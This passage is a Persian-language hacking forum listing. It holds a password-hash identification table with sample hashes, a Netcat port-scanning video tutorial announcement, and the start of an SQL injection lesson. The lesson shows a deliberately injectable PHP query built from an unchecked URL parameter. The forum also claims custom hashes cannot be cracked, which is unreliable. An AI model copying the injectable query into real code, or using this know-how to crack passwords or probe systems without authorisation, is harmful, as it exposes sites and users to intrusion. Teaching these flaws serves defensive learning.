  43. انواع هش هش ها انواع بسیار مختلفی دارند که به عنوان مثال نمونه هایی را مثال زدیم در پایین که از مشهورترین آنها و برکاربردترین انها md1 md2 md3 md4 md5 sha-1 را میتوان نام برد . بعضی از هش ها دستنویس هستند و نمیشه الگوریتم این نوع هش ها ( Hash Algoritm ) را بدست آورد و چون نفوذگر دسترسی به الگوریتم ندارد کرک کردن Hash Crack و بدست آوردن بسورد در این حالت غیر ممکن میشود انشاالله در بست های بعدی آموزش های تصویری را قرار میدهیم.. num of chars | type of hash | ex 016 MySQL: 7cd2b5942be28759 024 Haval128 (Base64): nkDtiD+2PphdKZtAzaK48g== 024 MD2 (Base64): 2oU7DT+I2ZswKDpp5t7Wuw== 024 MD4 (Base64): pEgBeq8h2FJfwQroeqZynQ== 024 MD5 (Base64): kAFQmDzST7DWlj99KOF/cg== 024 Tiger128 (Base64): 8ljB6IQUqypSerVB/8W4vw== 028 Haval160 (Base64): sh6HbE05HiqJdmEUnYNXa1UwoIk= 028 SHA-1 (Base64): qZk+NkcGgWq6PiVxeFDCbJzQ2J0= 028 Tiger160 (Base64): 8ljB6IQUqypSerVB/8W4v5Nfe5U= 032 .md5(md5($pass)): ec0405c5aef93e771cd80e0db180b88b 032 .md5(md5($pass).$salt): ec0405c5aef93e771cd80e0db180b88b 032 .md5(md5($salt).md5($pass)): 6b2e416060edbaa9d35302f13d3e1a6a 032 Domain Cached Credentials: bdaff79a8c1ec80aeda2b713127459bb 032 Haval128 (HMAC): 9e40ed883fb63e985d299b40cda2b8f2 032 Haval128_3: 9e40ed883fb63e985d299b40cda2b8f2 032 Haval128_4 cbeedc24a720eeebb519ebb74d150e29 032 Haval128_5 7d12652903d058b5501e6875d9d202d7 032 Haval192 (Base64): p7FMnvMJIxmw5147ILlX0YC/IHRWKeje 032 LM AAD3B435B51404EEAAD3B435B51404EE 032 MD2 (HMAC): da853b0d3f88d99b30283a69e6ded6bb 032 MD2: da853b0d3f88d99b30283a69e6ded6bb 032 MD4 (HMAC): a448017aaf21d8525fc10ae87aa6729d 032 MD4: a448017aaf21d8525fc10ae87aa6729d 032 MD5 (HMAC): 900150983cd24fb0d6963f7d28e17f72 032 MD5: 900150983cd24fb0d6963f7d28e17f72 032 NTLM: e0fba38268d0ec66ef1cb452d5885e53 032 RipeMD128 (HMAC): c14a12199c66e4ba84636b0f69144c77 032 RipeMD128: c14a12199c66e4ba84636b0f69144c77 032 SNEFRU128 (HMAC): 553d0648928299a0f22a275a02c83b10 032 SNEFRU128: 553d0648928299a0f22a275a02c83b10 032 Tiger128 (HMAC): f258c1e88414ab2a527ab541ffc5b8bf 032 Tiger128: f258c1e88414ab2a527ab541ffc5b8bf 032 Tiger192 (Base64): 8ljB6IQUqypSerVB/8W4v5Nfe5UcEylR 034 MD5 (Unix): $1$P2lE.rGp$SYCpUzBZjWRGKyMe/MbU00 037 MD5 (APR): $apr1$ZSc84vgF$YiKqBzqnUskAPKeDWlN8/0 040 Haval160 (HMAC): b21e876c4d391e2a897661149d83576b5530a089 040 Haval160: b21e876c4d391e2a897661149d83576b5530a089 040 Haval160_3 7da6a6938ac24f848f202e0ea7a3b5119eec2e6a 040 Haval160_4 6339f7fe0cbb724619f251f21c2662940bf9a6c6 040 Haval160_5 e79dbb57d907135ba95e892719446164c05497aa 040 Haval224 (Base64): W8lVIguiNGqUjShI7KN73V7KbsyntZS9MpI/qw== 040 MySQL v5.x: 0d3ced9bec10a777aec23ccc353a8c08a633045e 040 RipeMD160 (HMAC): 8eb208f7e05d987a9b044a8e98c6b087f15a0bfc 040 RipeMD160: 8eb208f7e05d987a9b044a8e98c6b087f15a0bfc 040 SHA-0: 58f00fa5db65ab4ba2551f77d9b575f41a805ae0 040 SHA-1 (HMAC): a9993e364706816aba3e25717850c26c9cd0d89d 040 SHA-1: a9993e364706816aba3e25717850c26c9cd0d89d 040 SHA224 (Base64): Iwl9IjQF2CKGQqR3vaJVsyqtvOS9oLP342ydpw== 040 Tiger160 (HMAC): f258c1e88414ab2a527ab541ffc5b8bf935f7b95 040 Tiger160: f258c1e88414ab2a527ab541ffc5b8bf935f7b95 044 Haval256 (Base64): hpnx4zhNBbKoSwMmk+K29G34WhOlDZOAjWh0u4+56Gw= 044 SHA256 (Base64): ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0= 044 SNEFRU256 (Base64): fQMyBWR6KvPcgzn2yyVkPDPrxiLTKXnEthKwLEkDAxs= 048 Haval192 (HMAC): a7b14c9ef3092319b0e75e3b20b957d180bf20745629e8de 048 Haval192: a7b14c9ef3092319b0e75e3b20b957d180bf20745629e8de 048 Haval192_4 e014185fbb9f19faba90dab14c25c34275cdd3e362775c65 048 Haval195_5 f36196ce912fbb5959948043f8248de2a92f74ab4a549b44 048 Tiger192 (HMAC): f258c1e88414ab2a527ab541ffc5b8bf935f7b951c132951 048 Tiger192: f258c1e88414ab2a527ab541ffc5b8bf935f7b951c132951 048 Tiger2 afd7ce60de4799388c88898d708b649d228fc06accecbbb6 056 Haval224 (HMAC): 5bc955220ba2346a948d2848eca37bdd5eca6ecca7b594bd32 923fab 056 Haval224: 5bc955220ba2346a948d2848eca37bdd5eca6ecca7b594bd32 923fab 056 Haval244_3 e29a8c16b58e57ebbfd22ddf169e04ffc0136c3452af19093f c1c4d0 056 Havan244_4 a29f04a725e5a700f1e388239564e5a3d7f22f3020365bf4f9 bc1d36 056 RipeMD320 (Base64): 3kwBswVPiTCnnQmuc46SMB5aFwhb7/3BuNEWcT50+C+pQtZM28RoLQ== 056 SHA224 (HMAC): 23097d223405d8228642a477bda255b32aadbce4bda0b3f7e3 6c9da7 056 SHA224: 23097d223405d8228642a477bda255b32aadbce4bda0b3f7e3 6c9da7 064 Haval256 (HMAC): 8699f1e3384d05b2a84b032693e2b6f46df85a13a50d93808d 6874bb8fb9e86c 064 Haval256: 8699f1e3384d05b2a84b032693e2b6f46df85a13a50d93808d 6874bb8fb9e86c 064 Haval256_3 48ab01f979cf2da92fda1e865ffa315ebb112d1ffe75038089 ef73b4abb181cc 064 Haval256_4 a22c64a107bf9118f8b22470e4daa0e7eb08dbad9f7e4d35dc f409ec40292a75 064 Haval256_5 5b25f8d944429aad67775eec490272dc21ca5631488f227ef5 efd25b30f91a72 064 RipeMD256 (HMAC): afbd6e228b9d8cbbcef5ca2d03e6dba10ac0bc7dcbe4680e1e 42d2e975459b65 064 SHA256 (HMAC): ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb4 10ff61f20015ad 064 SHA256: ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb4 10ff61f20015ad 064 SHA384 (Base64): ywB1P0WjXou1oD1pmsZQBycsMqsO3tFjGotgWkP/W+2AhgcroefMI1i67KE0yCWn 064 SNEFRU256 (HMAC): 7d033205647a2af3dc8339f6cb25643c33ebc622d32979c4b6 12b02c4903031b 064 SNEFRU256: 7d033205647a2af3dc8339f6cb25643c33ebc622d32979c4b6 12b02c4903031b 080 RipeMD320 (HMAC): de4c01b3054f8930a79d09ae738e92301e5a17085beffdc1b8 d116713e74f82fa942d64cdbc4682d 080 RipeMD320: de4c01b3054f8930a79d09ae738e92301e5a17085beffdc1b8 d116713e74f82fa942d64cdbc4682d 088 SHA512 (Base64): 3a81oZNherrMQXNJriBBMRLm+k6JqX6iCp7u5ktV05ohkpkqJ0/BqDa6PCOj/uu9RU1EI2Q86A4qmslPpUyknw== 096 SHA384 (HMAC): cb00753f45a35e8bb5a03d699ac65007272c32ab0eded1631a 8b605a43ff5bed8086072ba1e7cc2358baeca134c825a7 096 SHA384: cb00753f45a35e8bb5a03d699ac65007272c32ab0eded1631a 8b605a43ff5bed8086072ba1e7cc2358baeca134c825a7 128 SHA512 (HMAC): ddaf35a193617abacc417349ae20413112e6fa4e89a97ea20a 9eeee64b55d39a2192992a274fc1a8 36ba3c23a3feebbd454d4423643ce80e2a9ac94fa54ca49 f 128 SHA512: ddaf35a193617abacc417349ae20413112e6fa4e89a97ea20a 9eeee64b55d39a2192992a274fc1a8
    1 امتیاز
  44. درود با اولین بخش از آموزش تصویری اسکنر نت کت ( Netcat - NC ) در خدمتتون هستم و در این فیلم آموزشی می بینید که چطور میشه از نت کت بعنوان پورت اسکنر ( Port Scanne With Netcat ) استفاده کرد . تمامیه فیلمهارو بنده با توضیحات بسیار کامل ضبط کردم و طوری ضبط شده که برای هیچ یک از دوستان جای سوالی باقی نمیذاره . مدت زمان فیلم حدود 10 دقیقه هست و بهمراه توضیحات اختصاصی در خصوص تک تک دستوراتی که در فیلم بکار میبرم . پسورد فایل : guardiran.org . NC Part_1.part1.rar NC Part_1.part2.rar
    1 امتیاز
  45. اولین بخش از آموزشهای باگ Sql Injection رو شروع می کنیم . باگ sql زمانی رخ می دهد که برنامه نویس داده های ورودی ( Input Value ) را بدون کنترل مورد پردازش قرار داده و کد نویسی می کند و هکرها یا همون نفوذگرها از همین مشکل کد نویسی استفاده کرده و کنترل کامل سایت یا سرور مورد نظر را در دست میگیرند ونتیجه می گیریم هرکدی که از ورودی های کاربر برای جستجو در بانک اطلاعاتی ( Database ) بدون بررسی و کنترل بکار برده شود احتمال یک حمله موسوم به Sql Injection را در پی خواهد داشت . همچنین ورودی ها می تواند از طریق URL باشد و چه از طریق متد GET و یا چه از طریق متد POST و جهت آشنایی شما یک نمونه کوئری که بدون بررسی ، از متغیرها استفاده میکند و دارای باگ Sql Injection هست را با هم بررسی می کنیم : <?php $postid = $_GET['id']; $result = mysqli_query($con,"SELECT * FROM `post` WHERE `id`=$postid"); ?> به قطعه کد بالا دقت کنید و متوجه می شوید متغیر postid از ورودی id که در url میباشد مقداردهی میشود و همان ورودی که از URL را دریافت میکند به طور مستقیم مورد پردازش قرار می دهد و به این معنی هست که نفوذگر می تواند به طور مستقیم دستورات خود را وارد نماید تا توسط سرور مورد پردازش قرار گیرد و این کار بسیار خطرناک خواهد بود و همچنین به مثال زیر دقت کنید : [Hidden Content] پایان بخش اول از سری آموزشهای حملات Sql Injection .
    1 امتیاز
×
×
  • ایجاد مورد جدید...